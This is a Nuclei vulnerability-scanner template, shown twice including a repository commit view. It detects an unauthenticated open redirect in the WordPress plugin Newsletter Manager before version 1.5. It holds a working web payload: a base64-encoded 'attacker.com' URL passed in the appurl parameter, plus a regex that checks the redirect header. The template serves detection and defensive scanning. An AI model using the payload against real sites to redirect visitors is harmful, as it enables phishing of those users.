nuclei-templates/vulnerabilities/wordpress/newsletter-manager-open-red...

id: newsletter-manager-open-redirect

info:
  name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
  author: akincibor
  severity: low
  description: |
    The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
  reference:
    - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
  metadata:
    verified: true
  tags: wp-plugin,redirect,wordpress,wp,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ=="

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
Create newsletter-manager-open-redirect.yaml 2022-05-10 09:14:58 +00:00			`id: newsletter-manager-open-redirect`

			`info:`
			`name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect`
			`author: akincibor`
			`severity: low`
			`description: \|`
			`The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.`
			`reference:`
			`- https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1`
			`metadata:`
			`verified: true`
			`tags: wp-plugin,redirect,wordpress,wp,unauth`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ=="`

			`matchers:`
			`- type: regex`
			`part: header`
			`regex:`
			`- '(?m)^(?:Location\s?:\s?)(?:https?:\/\/\|\/\/\|\/\\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@])attacker\.com\/?(\/\|[^.].)?$' # https://regex101.com/r/ZDYhFh/1`